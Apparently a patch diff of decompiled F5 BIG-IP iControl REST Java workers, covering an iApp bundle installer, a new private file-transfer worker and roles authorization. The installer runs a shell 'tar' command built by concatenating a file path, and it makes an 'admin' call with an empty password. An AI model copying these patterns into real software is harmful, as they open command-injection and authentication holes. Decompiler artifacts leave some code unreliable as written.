failed\", new Object[] { this.val$extractTarCommand }) + RestHelper.throwableStackToString(ex));\n }\n };\n \n \n \n extractTar.startExecution(executionFinishedHandler);\n }\n \n \n private void queryInstalledRpm(final IAppBundleInstallTaskState taskState) {\n RestRequestCompletion queryCompletion = new RestRequestCompletion()\n {\n public void completed(RestOperation operation) {\n InstalledPackageCollectionState installedPackages = (InstalledPackageCollectionState)operation.getTypedBody(InstalledPackageCollectionState.class);\n \n \n if (installedPackages != null) {\n taskState.alreadyInstalledRpmsInfo = new ArrayList<>();\n for (InstalledPackageState installedPackage : installedPackages.items) {\n taskState.alreadyInstalledRpmsInfo.add(new IAppBundleInstallTaskState.RpmPackageInfo(installedPackage.appName, installedPackage.version, installedPackage.release, installedPackage.arch, \"\"));\n }\n }\n \n \n \n \n \n taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.QUERY_BIGIP_VERSION;\n IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState);\n }\n \n \n public void failed(Exception exception, RestOperation operation) {\n taskState.errorMessage = String.format(\"Failed to query Global Installed Package Worker: %s\", new Object[] { exception.getMessage() });\n \n \n IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, taskState.errorMessage, RestHelper.throwableStackToString(exception));\n }\n };\n \n \n RestOperation queryOperation = RestOperation.create().setCompletion(queryCompletion).setUri(buildLocalUri(new String[] { GlobalInstalledPackageCollectionWorker.WORKER_URI_PATH }));\n \n \n \n \n sendGet(queryOperation);\n }\n \n \n \n private void queryBigipVersion(final IAppBundleInstallTaskState taskState) {\n RestRequestCompletion queryCompletion = new RestRequestCompletion()\n {\n public void completed(RestOperation operation) {\n DeviceInfoState infoState = (DeviceInfoState)operation.getTypedBody(DeviceInfoState.class);\n IAppBundleInstallTaskCollectionWorker.this.bigIpVersion = infoState.version;\n taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.EXTRACT_RPMS_FROM_BUNDLE;\n IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState);\n }\n \n \n public void failed(Exception exception, RestOperation operation) {\n taskState.errorMessage = String.format(\"Failed to query BigIP version from DeviceInfo Worker: %s\", new Object[] { exception.getMessage() });\n \n \n IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, taskState.errorMessage, RestHelper.throwableStackToString(exception));\n }\n };\n \n \n RestOperation queryOperation = RestOperation.create().setCompletion(queryCompletion).setUri(buildLocalUri(new String[] { DeviceInfoWorker.WORKER_URI_PATH }));\n \n \n \n \n sendGet(queryOperation);\n }\n \n \n private void extractRpmsFromBundle(final IAppBundleInstallTaskState taskState) {\n final String extractTarCommand = \"tar -xvf \" + taskState.filePath + \" --directory \" + \"/var/config/rest/downloads/\";\n \n ShellExecutor extractTar = new ShellExecutor(extractTarCommand);\n \n CompletionHandler<ShellExecutionResult> executionFinishedHandler = new CompletionHandler<ShellExecutionResult>()\n {\n public void completed(ShellExecutionResult extractTarResult)\n {\n if (extractTarResult.getExitStatus().intValue() != 0) {\n String error = extractTarCommand + \" failed with exit code=\" + extractTarResult.getExitStatus();\n \n \n IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, \"Validate usecase pack by extracting iApps failed\", error + \"stdout + stderr=\" + extractTarResult.getOutput());\n \n \n \n return;\n }\n \n \n populateRpmsToBeInstalled(taskState, extractTarResult);\n \n taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.READ_MANIFEST_FILE;\n IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState);\n }\n \n \n \n \n private void populateRpmsToBeInstalled(IAppBundleInstallTaskState taskState, ShellExecutionResult extractTarResult) {\n ArrayList<IAppBundleInstallTaskState.RpmPackageInfo> alreadyInstalledRpms = new ArrayList<>();\n taskState.appRpmsInfo = new ArrayList<>();\n \n String[] rpmsToBeInstalled = extractTarResult.getOutput().split(\"\\\\n\");\n \n \n for (int i = 0; i < rpmsToBeInstalled.length; i++) {\n \n if (isManifestFile(rpmsToBeInstalled[i])) {\n taskState.manifestFileName = rpmsToBeInstalled[i];\n }\n else {\n \n IAppBundleInstallTaskState.RpmPackageInfo rpmToBeInstalled = getRpmPackageInfo(rpmsToBeInstalled[i]);\n \n if (!rpmToBeInstalled.error.equals(\"\")) {\n updateRpmStatus(taskState, rpmsToBeInstalled[i], IAppBundleInstallTaskState.RpmStatus.ERRORED, rpmToBeInstalled.error);\n }\n else if (isRpmInstallRequired(rpmToBeInstalled)) {\n updateRpmStatus(taskState, rpmsToBeInstalled[i], IAppBundleInstallTaskState.RpmStatus.EXTRACTED, \"\");\n } else {\n \n alreadyInstalledRpms.add(rpmToBeInstalled);\n }\n }\n } taskState.alreadyInstalledRpmsInfo = alreadyInstalledRpms;\n }\n \n private boolean isManifestFile(String fileName) {\n int index = fileName.lastIndexOf('.');\n if (index != -1 && fileName.substring(index + 1).equals(\"json\"))\n {\n return true;\n }\n return false;\n }\n \n \n \n \n private void updateRpmStatus(IAppBundleInstallTaskState taskState, String rpmToBeInstalled, IAppBundleInstallTaskState.RpmStatus rpmStatus, String error) {\n if (rpmToBeInstalled.contains(\"framework\")) {\n taskState.frameworkRpmInfo = new IAppBundleInstallTaskState.RpmInfo(rpmToBeInstalled, rpmStatus, error);\n } else {\n \n taskState.appRpmsInfo.add(new IAppBundleInstallTaskState.RpmInfo(rpmToBeInstalled, rpmStatus, error));\n }\n }\n \n \n private boolean isRpmInstallRequired(IAppBundleInstallTaskState.RpmPackageInfo rpmToBeInstalled) {\n if (taskState.alreadyInstalledRpmsInfo == null || taskState.alreadyInstalledRpmsInfo.isEmpty())\n {\n return true;\n }\n for (IAppBundleInstallTaskState.RpmPackageInfo alreadyInstalledRpm : taskState.alreadyInstalledRpmsInfo) {\n if (alreadyInstalledRpm.name.equals(rpmToBeInstalled.name)) {\n if (VersionUtil.compareVersion(alreadyInstalledRpm.version, rpmToBeInstalled.version) > 0) {\n \n \n rpmToBeInstalled.error = createAlreadyInstalledRpmErrorMessage(rpmToBeInstalled, alreadyInstalledRpm);\n \n return false;\n } if (VersionUtil.compareVersion(alreadyInstalledRpm.version, rpmToBeInstalled.version) == 0)\n {\n \n if (VersionUtil.compareBuild(alreadyInstalledRpm.release, rpmToBeInstalled.release) >= 0) {\n \n \n createAlreadyInstalledRpmErrorMessage(rpmToBeInstalled, alreadyInstalledRpm);\n \n return false;\n }\n }\n break;\n }\n }\n return true;\n }\n \n \n \n private String createAlreadyInstalledRpmErrorMessage(IAppBundleInstallTaskState.RpmPackageInfo rpmToBeInstalled, IAppBundleInstallTaskState.RpmPackageInfo alreadyInstalledRpm) {\n return rpmToBeInstalled.error = \"Installed rpm version is \" + alreadyInstalledRpm.version + \" and release is \" + alreadyInstalledRpm.release;\n }\n \n \n \n private IAppBundleInstallTaskState.RpmPackageInfo getRpmPackageInfo(String rpmFileName) {\n IAppBundleInstallTaskState.RpmPackageInfo rpmPackageInfo = new IAppBundleInstallTaskState.RpmPackageInfo(\"\", \"\", \"\", \"\", \"\");\n \n \n \n int index = rpmFileName.lastIndexOf('.');\n if (index == -1 || !rpmFileName.substring(index + 1).equals(\"rpm\")) {\n \n rpmPackageInfo.error = \"Not a rpm file\";\n return rpmPackageInfo;\n }\n rpmFileName = rpmFileName.substring(0, index);\n \n index = rpmFileName.lastIndexOf('.'); String subStr;\n if (index == -1 || !(subStr = rpmFileName.substring(index + 1)).equals(\"noarch\")) {\n \n \n rpmPackageInfo.error = \"Invalid file name format - 'arch' not found in file name\";\n return rpmPackageInfo;\n }\n rpmPackageInfo.arch = subStr;\n rpmFileName = rpmFileName.substring(0, index);\n \n index = rpmFileName.lastIndexOf('-');\n if (index == -1 || (subStr = rpmFileName.substring(index + 1)).length() == 0 || !Character.isDigit(subStr.charAt(0))) {\n \n \n rpmPackageInfo.error = \"Invalid file name format - release not found in file name\";\n return rpmPackageInfo;\n }\n rpmPackageInfo.release = subStr;\n rpmFileName = rpmFileName.substring(0, index);\n \n index = rpmFileName.lastIndexOf('-');\n if (index == -1 || (subStr = rpmFileName.substring(index + 1)).length() == 0 || !Character.isDigit(subStr.charAt(0))) {\n \n \n rpmPackageInfo.error = \"Invalid file name format - version not found in file name\";\n return rpmPackageInfo;\n }\n rpmPackageInfo.version = subStr;\n \n rpmPackageInfo.name = rpmFileName.substring(0, index);\n if (rpmPackageInfo.name.length() == 0) {\n rpmPackageInfo.error = \"Invalid file name format - name not found in file name\";\n return rpmPackageInfo;\n }\n return rpmPackageInfo;\n }\n \n \n public void failed(Exception ex, ShellExecutionResult rpmQueryResult) {\n IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, \"Extract iApps from usecase pack failed\", String.format(\"%s failed\", new Object[] { this.val$extractTarCommand }) + RestHelper.throwableStackToString(ex));\n }\n };\n \n \n extractTar.startExecution(executionFinishedHandler);\n }\n \n \n \n private void readManifestFile(final IAppBundleInstallTaskState taskState) {\n if (LangUtil.isNullOrEmpty(taskState.manifestFileName)) {\n failTask(taskState, \"Access Guided Configuration use case pack does not contain manifest file.\", \"\");\n \n return;\n }\n \n final CompletionHandler<Integer, ByteBuffer> completion = new CompletionHandler<Integer, ByteBuffer>()\n {\n public void completed(Integer result, ByteBuffer bb) {\n InputStream in = new ByteArrayInputStream(bb.array());\n InputStreamReader inr = new InputStreamReader(in);\n taskState.manifest = (IAppBundleInstallTaskState.Manifest)RestOperation.fromJson(inr, IAppBundleInstallTaskState.Manifest.class);\n \n taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.FILTER_RPMS_ON_MIN_BIGIP_VERSION_REQUIRED;\n IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState);\n }\n \n \n public void failed(Throwable exc, ByteBuffer attachment) {\n IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, String.format(\"Failed to read manifest file %s - %s\", new Object[] { this.val$taskState.manifestFileName, exc.getMessage() }), RestHelper.throwableStackToString(exc));\n }\n };\n \n \n \n \n StandardOpenOption option = StandardOpenOption.READ;\n Path path = Paths.get(\"/var/config/rest/downloads/\" + taskState.manifestFileName, new String[0]);\n try {\n final AsynchronousFileChannel fileChannel = AsynchronousFileChannel.open(path, new OpenOption[] { option });\n \n ByteBuffer buffer = ByteBuffer.allocate((int)fileChannel.size());\n \n CompletionHandler<Integer, ByteBuffer> completionHandler = new CompletionHandler<Integer, ByteBuffer>()\n {\n \n public void completed(final Integer result, final ByteBuffer attachment)\n {\n RestThreadManager.getBlockingPool().execute(new Runnable()\n {\n public void run() {\n completion.completed(result, attachment);\n try {\n fileChannel.close();\n } catch (IOException e) {\n IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, String.format(\"Failed to close channel for manifest file %s - %s\", new Object[] { this.this$1.val$taskState.manifestFileName, e.getMessage() }), RestHelper.throwableStackToString(e));\n }\n }\n });\n }\n \n \n \n \n \n \n \n \n public void failed(final Throwable exc, final ByteBuffer attachment) {\n RestThreadManager.getBlockingPool().execute(new Runnable()\n {\n public void run() {\n completion.failed(exc, attachment);\n try {\n fileChannel.close();\n } catch (IOException e) {\n IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, String.format(\"Failed to close channel for manifest file %s - %s\", new Object[] { this.this$1.val$taskState.manifestFileName, this.val$exc.getMessage() }), RestHelper.throwableStackToString(exc));\n }\n }\n });\n }\n };\n \n \n \n \n fileChannel.read(buffer, 0L, buffer, completionHandler);\n } catch (IOException e) {\n failTask(taskState, String.format(\"Failed to read manifest file %s - %s\", new Object[] { taskState.manifestFileName, e.getMessage() }));\n }\n }\n \n \n \n \n private void filterRpmsOnMinBigipVersionRequired(IAppBundleInstallTaskState taskState) {\n if (taskState.frameworkRpmInfo != null) {\n checkForMinBigIPVersion(taskState, taskState.frameworkRpmInfo);\n }\n for (IAppBundleInstallTaskState.RpmInfo appRpmInfo : taskState.appRpmsInfo) {\n checkForMinBigIPVersion(taskState, appRpmInfo);\n }\n if (taskState.frameworkRpmInfo != null && taskState.frameworkRpmInfo.status != IAppBundleInstallTaskState.RpmStatus.ERRORED) {\n \n taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.INSTALL_FRAMEWORK_RPM;\n } else if (!taskState.appRpmsInfo.isEmpty()) {\n taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.INSTALL_APP_RPMS;\n } else {\n taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.DONE;\n }\n sendStatusUpdate(taskState);\n }\n \n \n private void checkForMinBigIPVersion(IAppBundleInstallTaskState taskState, IAppBundleInstallTaskState.RpmInfo rpmInfo) {\n for (IAppBundleInstallTaskState.Manifest.Package pkg : taskState.manifest.packages) {\n if (rpmInfo.name.contains(pkg.name)) {\n if (VersionUtil.compareVersion(this.bigIpVersion, pkg.minBigIpVersion) < 0) {\n rpmInfo.error = \"BigIP version (\" + this.bigIpVersion + \") is lower than minimum BigIP version (\" + pkg.minBigIpVersion + \") required for the iApp Rpm.\";\n \n \n rpmInfo.status = IAppBundleInstallTaskState.RpmStatus.ERRORED;\n }\n break;\n }\n }\n }\n \n \n \n private void installFrameworkRpmInBundle(IAppBundleInstallTaskState taskState) {\n IAppBundleInstallTaskState.IAppBundleInstallStep nextStep = IAppBundleInstallTaskState.IAppBundleInstallStep.UPDATE_USECASE_PACK_VERSION;\n if (!taskState.appRpmsInfo.isEmpty()) {\n nextStep = IAppBundleInstallTaskState.IAppBundleInstallStep.INSTALL_APP_RPMS;\n }\n installRpm(taskState.frameworkRpmInfo, taskState, nextStep);\n }\n \n \n \n private void installAppRpmsInBundle(IAppBundleInstallTaskState taskState) {\n IAppBundleInstallTaskState.RpmInfo appRpm;\n do {\n taskState.toBeInstalledAppRpmsIndex++;\n if (taskState.toBeInstalledAppRpmsIndex == taskState.appRpmsInfo.size()) {\n \n taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.UPDATE_USECASE_PACK_VERSION;\n sendStatusUpdate(taskState);\n return;\n }\n appRpm = taskState.appRpmsInfo.get(taskState.toBeInstalledAppRpmsIndex);\n }\n while (appRpm.status == IAppBundleInstallTaskState.RpmStatus.ERRORED);\n \n installRpm(appRpm, taskState, IAppBundleInstallTaskState.IAppBundleInstallStep.INSTALL_APP_RPMS);\n }\n \n \n \n \n private void installRpm(final IAppBundleInstallTaskState.RpmInfo rpmInfo, final IAppBundleInstallTaskState taskState, final IAppBundleInstallTaskState.IAppBundleInstallStep nextStep) {\n rpmInfo.status = IAppBundleInstallTaskState.RpmStatus.INSTALLING;\n IAppPackageManagementTaskState packageMgmt = new IAppPackageManagementTaskState();\n packageMgmt.operation = IAppPackageManagementTaskState.IAppPackageOperation.INSTALL;\n packageMgmt.packageFilePath = \"/var/config/rest/downloads/\" + rpmInfo.name;\n \n RestRequestCompletion installCompletion = new RestRequestCompletion()\n {\n public void completed(RestOperation operation) {\n rpmInfo.status = IAppBundleInstallTaskState.RpmStatus.INSTALLED;\n taskState.step = nextStep;\n IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState);\n }\n \n \n public void failed(Exception exception, RestOperation operation) {\n IAppPackageManagementTaskState installResponse = (IAppPackageManagementTaskState)operation.getTypedBody(IAppPackageManagementTaskState.class);\n \n String errorMessage = (installResponse != null && installResponse.errorMessage != null) ? installResponse.errorMessage : \"\";\n \n \n \n rpmInfo.status = IAppBundleInstallTaskState.RpmStatus.ERRORED;\n rpmInfo.error = errorMessage;\n taskState.step = nextStep;\n IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState);\n }\n };\n \n RestOperation installOperation = RestOperation.create().setUri(buildLocalUri(new String[] { IAppPackageManagementTaskCollectionWorker.WORKER_URI_PATH })).setBody(packageMgmt).setCompletion((RestRequestCompletion)new TaskCompletion(getServer(), getLogger(), installCompletion));\n \n \n \n \n \n \n \n sendPost(installOperation);\n }\n \n \n \n private void updateUsecasePackVersion(final IAppBundleInstallTaskState taskState, final int retryCount) {\n RestRequestCompletion postCompletion = new RestRequestCompletion()\n {\n public void completed(RestOperation operation) {\n taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.DONE;\n IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState);\n }\n \n \n public void failed(Exception exception, RestOperation operation) {\n if (retryCount < 5) {\n IAppBundleInstallTaskCollectionWorker.this.scheduleTaskOnce(new Runnable() {\n public void run() {\n IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState, Integer.valueOf(retryCount + 1));\n }\n }5000 * (1 << retryCount));\n } else {\n taskState.errorMessage = String.format(\"Failed to update usecase pack version: %s\", new Object[] { exception.getMessage() });\n \n \n IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, taskState.errorMessage, RestHelper.throwableStackToString(exception));\n }\n }\n };\n \n \n JsonObject body = new JsonObject();\n body.addProperty(\"usecasePackVersion\", taskState.manifest.usecasePackVersion);\n \n body.addProperty(\"usecasePackBuild\", getAgcUsecasePackBuild(taskState.filePath));\n \n RestOperation postOperation = RestOperation.create().setBody(body).setBasicAuthorization(\"admin\", \"\").setCompletion(postCompletion).setUri(buildLocalUri(new String[] { \"/mgmt/tm/access/usecase-pack-info\" }));\n \n \n \n \n \n \n \n sendPost(postOperation);\n }\n \n \n private String getAgcUsecasePackBuild(String filePath) {\n int ind = filePath.lastIndexOf('.');\n if (ind != -1) {\n filePath = filePath.substring(0, ind);\n }\n \n ind = filePath.lastIndexOf('.');\n if (ind != -1) {\n filePath = filePath.substring(0, ind);\n }\n \n ind = filePath.lastIndexOf('-');\n if (ind == -1) {\n getLogger().info(\"Access Guided Configuration use case pack name does not contain build number\");\n return \"\";\n }\n filePath = filePath.substring(ind + 1);\n if (!Character.isDigit(filePath.charAt(0))) {\n getLogger().info(\"Access Guided Configuration use case pack name does not contain build number\");\n return \"\";\n }\n return filePath;\n }\n \n \n \n \n \n \n \n \n public void failTask(IAppBundleInstallTaskState taskState, String errorMessage, String errorDetails) {\n getLogger().severe(errorMessage + \" error details: \" + errorDetails);\n failTask(taskState, errorMessage);\n }\n }\n diff --git a/com/f5/rest/workers/FileTransferPrivateWorker.java b/com/f5/rest/workers/FileTransferPrivateWorker.java\n new file mode 100644\n index 0000000..50238b7\n --- /dev/null\n +++ b/com/f5/rest/workers/FileTransferPrivateWorker.java\n @@ -0,0 +1,84 @@\n +package com.f5.rest.workers;\n +\n +import com.f5.rest.common.RestLogger;\n +import com.f5.rest.common.RestOperation;\n +import com.f5.rest.workers.filemanagement.FileManagementHelper;\n +\n +\n +\n +\n +\n +\n +\n +\n +\n +\n +\n +\n +\n +\n +public class FileTransferPrivateWorker\n + extends FileTransferWorker\n +{\n + private static final RestLogger LOGGER = new RestLogger(FileTransferPrivateWorker.class, \"\");\n +\n +\n + public FileTransferPrivateWorker(String postDirectory, String tmpDirectory) throws Exception {\n + super(postDirectory, tmpDirectory);\n + }\n +\n +\n +\n +\n +\n +\n + public FileTransferPrivateWorker(String getDirectory) throws Exception {\n + super(getDirectory);\n + }\n +\n +\n + public void onPost(RestOperation post) {\n + if (validateLocalRequest(post)) {\n + failRequest(post);\n + return;\n + }\n + super.onPost(post);\n + }\n +\n +\n + protected void onDelete(RestOperation delete) {\n + if (validateLocalRequest(delete)) {\n + failRequest(delete);\n + return;\n + }\n + super.onDelete(delete);\n + }\n +\n +\n + public void onGet(RestOperation get) {\n + if (validateLocalRequest(get)) {\n + failRequest(get);\n + return;\n + }\n + super.onGet(get);\n + }\n +\n +\n + protected void onQuery(RestOperation request) {\n + if (validateLocalRequest(request)) {\n + failRequest(request);\n + return;\n + }\n + super.onQuery(request);\n + }\n +\n + private boolean validateLocalRequest(RestOperation request) {\n + return request.getReferer().equals(request.getRemoteSender());\n + }\n +\n + private void failRequest(RestOperation post) {\n + FileManagementHelper.cleanPostForResponse(post);\n + post.setStatusCode(404);\n + post.fail(new IllegalAccessException(\"Private endpoints are not supported from remote\"));\n + }\n +}\n diff --git a/com/f5/rest/workers/RolesWorker.java b/com/f5/rest/workers/RolesWorker.java\n index 244f6d5..2ef8e3b 100644\n --- a/com/f5/rest/workers/RolesWorker.java\n +++ b/com/f5/rest/workers/RolesWorker.java\n @@ -1,1375 +1,1371 @@\n package com.f5.rest.workers;\n \n import com.f5.rest.common.CompletionHandler;\n import com.f5.rest.common.RestCollectionMergeResult;\n import com.f5.rest.common.RestCollectionWorker;\n import com.f5.rest.common.RestHelper;\n import com.f5.rest.common.RestOperation;\n import com.f5.rest.common.RestReference;\n import com.f5.rest.common.RestRequestCompletion;\n import com.f5.rest.common.RestServer;\n import com.f5.rest.common.RestWorker;\n import com.f5.rest.common.SubscriptionWorker;\n import com.f5.rest.common.UrlHelper;\n import com.f5.rest.common.WellKnownPorts;\n import com.f5.rest.workers.authn.AuthnWorker;\n import com.f5.rest.workers.authz.AuthzHelper;\n import com.f5.rest.workers.authz.EffectivePermissionsWorker;\n import com.f5.rest.workers.gossip.RemoteStateCopier;\n import java.net.URI;\n import java.util.HashSet;\n import java.util.Iterator;\n import java.util.Map;\n import java.util.Set;\n import java.util.TimerTask;\n import java.util.concurrent.ConcurrentHashMap;\n import java.util.concurrent.ConcurrentLinkedQueue;\n import java.util.concurrent.atomic.AtomicBoolean;\n \n \n \n \n \n \n \n \n \n \n \n \n \n public class RolesWorker\n extends RestCollectionWorker<RolesWorkerState, RolesCollectionState>\n implements EvaluatePermissions.Evaluate\n {\n public static final String WORKER_URI_PATH = WellKnownPorts.AUTHZ_ROLES_WORKER_URI_PATH;\n \n private static final String EXTERNAL_ROLES_WORKER_URI_PATH = UrlHelper.normalizeUriPath(UrlHelper.makePublicPath(WellKnownPorts.AUTHZ_ROLES_WORKER_URI_PATH));\n \n private static final String EXTERNAL_RESOURCE_GROUPS_WORKER_URI_PATH = UrlHelper.normalizeUriPath(UrlHelper.makePublicPath(WellKnownPorts.AUTHZ_RESOURCE_GROUPS_WORKER_URI_PATH));\n \n private static final String EXTERNAL_LOGIN_WORKER_PATH = UrlHelper.normalizeUriPath(UrlHelper.makePublicPath(AuthnWorker.WORKER_URI_PATH));\n \n private static final String EXTERNAL_EFFECTIVE_PERMISSIONS_WORKER_PATH = UrlHelper.normalizeUriPath(UrlHelper.makePublicPath(WellKnownPorts.AUTHZ_EFFECTIVE_PERMISSIONS_WORKER_URI_PATH));\n \n public static final String ADMIN_ROLE = \"Administrator\";\n \n public static final String ADMIN_ROLE_DESCRIPTION = \"Administrators are able to perform any action.\";\n public static final String READ_ONLY_MSG_FMT = \"Cannot %s built in roles.\";\n private static final String LOCAL_USERS_PATH = UrlHelper.makePublicPath(WellKnownPorts.AUTHZ_USERS_WORKER_URI_PATH);\n \n \n private final Map<String, RoleResourceMatcher> roleNameToResources = new ConcurrentHashMap<>();\n private final Map<RestReference, Set<String>> resourceGroupToRoleNames = new ConcurrentHashMap<>();\n private final Map<RestReference, Set<String>> userLinkToRoleNames = new ConcurrentHashMap<>();\n \n \n \n private TmosRoleCache tmosRoleCache;\n \n \n ConcurrentLinkedQueue<RestReference> usersToRemove = new ConcurrentLinkedQueue<>();\n AtomicBoolean isUserRemovalRunning = new AtomicBoolean();\n \n private final RoleResourceGroupWorker resourcesGroupWorker;\n private final EffectivePermissionsWorker effectivePermissionsWorker;\n \n public RolesWorker() {\n super(RolesWorkerState.class, RolesCollectionState.class);\n this.resourcesGroupWorker = new RoleResourceGroupWorker(this);\n this.effectivePermissionsWorker = new EffectivePermissionsWorker(this);\n }\n \n \n \n \n \n public void onStart(RestServer server) throws Exception {\n EvaluatePermissions.setRolesWorker(this, server.getPort());\n \n this.tmosRoleCache = new TmosRoleCache(server.getPort());\n setIdempotentPostEnabled(true);\n setFullStateRequiredOnStart(true);\n setMaxPendingOperations(10000L);\n \n URI subscriptionsUri = makeLocalUri(SubscriptionWorker.ALREADY_STARTED_WORKER_URI_PATH);\n URI publicationsUri = makeLocalUri(\"shared/publisher\");\n URI tmosRoleUri = makeLocalUri(TmosRoleWorkerState.WORKER_PATH);\n URI localRolesUri = makeLocalUri(TmosLocalRolesWorkerState.WORKER_PATH);\n \n URI resourceGroupWorkerUri = getServer().registerWorkerUri(WellKnownPorts.AUTHZ_RESOURCE_GROUPS_WORKER_URI_PATH, (RestWorker)this.resourcesGroupWorker);\n \n \n URI effectivePermissionWorkerUri = getServer().registerWorkerUri(WellKnownPorts.AUTHZ_EFFECTIVE_PERMISSIONS_WORKER_URI_PATH, (RestWorker)this.effectivePermissionsWorker);\n \n \n \n completeStart(this.collectionClass, new URI[] { resourceGroupWorkerUri, effectivePermissionWorkerUri, tmosRoleUri, localRolesUri, subscriptionsUri, publicationsUri });\n }\n \n \n \n \n \n protected void onStartCompleted(Object loadedState, Exception stateLoadEx, Exception availabilityEx) throws Exception {\n RolesCollectionState collectionState = (RolesCollectionState)loadedState;\n \n for (RolesWorkerState role : collectionState.items) {\n addRole(role);\n }\n \n \n \n RestRequestCompletion notificationCompletion = new RestRequestCompletion()\n {\n public void completed(RestOperation operation)\n {\n if (operation.getMethod() != RestOperation.RestMethod.DELETE) {\n return;\n }\n \n RestResolverGroupEntry entry = (RestResolverGroupEntry)operation.getTypedBody(RestResolverGroupEntry.class);\n for (RestReference ref : entry.references) {\n RolesWorker.this.queueUserRemoval(ref);\n }\n }\n \n \n public void failed(Exception ex, RestOperation operation) {\n RolesWorker.this.getLogger().severeFmt(\"%s\", new Object[] { ex.getMessage() });\n }\n };\n \n \n RestRequestCompletion subscribeCompletion = new RestRequestCompletion()\n {\n public void failed(Exception ex, RestOperation operation)\n {\n RolesWorker.this.getLogger().warningFmt(\"Failed to subscribe to worker: %s\", new Object[] { RestHelper.throwableStackToString(ex) });\n }\n \n \n \n public void completed(RestOperation operation) {\n RolesWorker.this.getLogger().fineFmt(\"Successfully subscribed to %s\", new Object[] { operation.getUri().getPath() });\n }\n };\n \n AuthzHelper.subscribeToUsers(getServer(), subscribeCompletion, notificationCompletion);\n \n AuthzHelper.subscribeToUserGroups(getServer(), subscribeCompletion, notificationCompletion);\n \n \n \n \n \n RestRequestCompletion resourceGroupNotificationCompletion = new RestRequestCompletion()\n {\n public void completed(RestOperation operation)\n {\n if (operation.getMethod() != RestOperation.RestMethod.DELETE) {\n return;\n }\n RoleResourceGroupState groupState = (RoleResourceGroupState)operation.getTypedBody(RoleResourceGroupState.class);\n \n RolesWorker.this.removeResourceGroupsFromRoles(new RestReference(groupState.selfLink));\n }\n \n \n public void failed(Exception ex, RestOperation operation) {\n RolesWorker.this.getLogger().severeFmt(\"%s\", new Object[] { ex.getMessage() });\n }\n };\n \n \n RestOperation subscribeRequest = RestOperation.create().setUri(buildLocalUri(new String[] { WellKnownPorts.AUTHZ_RESOURCE_GROUPS_WORKER_URI_PATH })).setCompletion(subscribeCompletion);\n \n \n \n sendPostForSubscription(subscribeRequest, getServer(), resourceGroupNotificationCompletion);\n \n \n \n super.onStartCompleted(loadedState, stateLoadEx, availabilityEx);\n \n removeStaleResourceGroups(collectionState);\n }\n \n \n \n \n \n \n \n \n \n \n private void removeStaleResourceGroups(final RolesCollectionState rolesCollection) {\n RestRequestCompletion getCompletion = new RestRequestCompletion()\n {\n public void failed(Exception ex, RestOperation operation)\n {\n RolesWorker.this.getLogger().warningFmt(\"Failed to clean up stale resource groups: %s\", new Object[] { RestHelper.throwableStackToString(ex) });\n }\n \n \n \n \n public void completed(RestOperation operation) {\n RoleResourceGroupCollection groupCollection = (RoleResourceGroupCollection)operation.getTypedBody(RoleResourceGroupCollection.class);\n \n \n Set<URI> groupUris = new HashSet<>();\n for (RoleResourceGroupState group : groupCollection.items) {\n groupUris.add(group.selfLink);\n }\n \n for (RolesWorkerState role : rolesCollection.items) {\n boolean needsUpdate = false;\n if (role.resourceGroupReferences != null) {\n Iterator<RestReference> iter = role.resourceGroupReferences.iterator();\n while (iter.hasNext()) {\n if (!groupUris.contains(((RestReference)iter.next()).link)) {\n iter.remove();\n needsUpdate = true;\n }\n }\n }\n \n if (needsUpdate) {\n RolesWorker.this.putRole(role);\n }\n }\n }\n };\n \n \n RestOperation get = RestOperation.create().setUri(makeLocalUri(WellKnownPorts.AUTHZ_RESOURCE_GROUPS_WORKER_URI_PATH)).setCompletion(getCompletion);\n \n \n sendGet(get);\n }\n \n private void putRole(final RolesWorkerState role) {\n RestRequestCompletion updateCompletion = new RestRequestCompletion()\n {\n public void failed(Exception ex, RestOperation operation)\n {\n RolesWorker.this.getLogger().warningFmt(\"Failed to update role %s: %s\", new Object[] { this.val$role.name, RestHelper.throwableStackToString(ex) });\n }\n \n \n \n \n public void completed(RestOperation operation) {\n RolesWorker.this.getLogger().fineFmt(\"Successfully update role: %s\", new Object[] { this.val$role.name });\n }\n };\n \n \n RestOperation op = RestOperation.create().setUri(makeLocalUri(role.selfLink)).setBody(role).setCompletion(updateCompletion);\n \n sendPut(op);\n }\n \n \n public void onGet(final RestOperation request) {\n final String destinationRoleName = getItemIdFromRequest(request);\n \n \n \n \n \n \n \n \n \n \n \n \n RestReference userReference = request.getAuthUserReference();\n if (userReference == null || AuthzHelper.isDefaultAdminRef(userReference)) {\n super.onGet(request);\n \n return;\n }\n hasAdminRole(request, new CompletionHandler<Boolean>()\n {\n public void completed(Boolean isAdmin)\n {\n if (isAdmin != null && isAdmin.booleanValue()) {\n RolesWorker.this.onGet(request);\n \n return;\n }\n if (RolesWorker.this.hasVisibilityToRole(request, destinationRoleName)) {\n RolesWorker.this.onGet(request);\n \n return;\n }\n if (destinationRoleName != null) {\n \n String error = String.format(\"Authorization failed: userReference [%s] is not a member of role [%s].\", new Object[] { (this.val$request.getAuthUserReference()).link, this.val$destinationRoleName });\n \n \n request.setStatusCode(401);\n request.fail(new SecurityException(error));\n \n return;\n }\n RolesWorker.this.onGet(request);\n }\n \n \n public void failed(Exception ex, Boolean isAdmin) {\n 